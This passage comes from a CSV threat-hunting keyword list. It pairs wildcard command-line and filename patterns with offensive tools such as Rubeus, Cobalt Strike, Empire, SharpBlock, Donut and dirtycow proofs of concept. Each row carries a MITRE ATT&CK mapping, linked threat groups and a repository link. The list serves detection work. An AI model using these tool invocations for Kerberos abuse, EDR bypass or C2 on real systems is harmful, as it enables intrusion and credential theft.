+"* -DestHost * -DestPort 5555 -UseDefaultProxy*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"* 
detect-hooks.c *","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z"
+"* dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* diagrun=true service=DNS* dllpath=*.dll* computername=*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z"
+"* diamond * /certificate:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* diamond /tgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* diamond /user:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"* dicom-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* dicom-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* dict-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* DInvokeResolver.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"* dir /s */ Microsoft.ActiveDirectory.Management.dll*","greyware_tool_keyword","dir","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","A0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z"
+"* dirty.c*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z"
+"* dirtycow.c *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z"
+"* Dirty-Pipe.*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","0","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z"
+"* Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","0","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z"
+"* --disable-bypass-amsi*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z"
+"* --disable-bypass-cmdline*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z"
+"* --disable-bypass-etw*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z"
+"* DisableETW(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"* DisableWLDP(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"* distcc-cve2004-2687.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --dll * --only *AmsiScanBuffer*AmsiScanString*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
+"* --dll * --payload *","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","6","567","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z"
+"* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z"
+"* --dll --dllhijack *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* -DllName * -FunctionName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* -dns_stager_prepend *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"* -dns_stager_subhost *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"* dns-blacklist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* dns-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* dns-cache-snoop.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z"
+"* dns-check-zone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-client-subnet-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-fuzz.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-ip6-arpa-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dnslog-cn.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* dns-nsec3-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-nsec-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-nsid.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-random-srcport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-random-txid.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-recursion.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-srv-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -dns-tcp -nameserver * -dc-ip*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* dns-update.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-zeustracker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* dns-zone-transfer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* docker-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -domain * /dc * /service cifs /ptt*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"* --domain * --kerberos*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","0","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" +"* -Domain * -SMB1 *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* domainDumper*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","0","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"* domainhunter *","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"* --domains ./domains.txt 
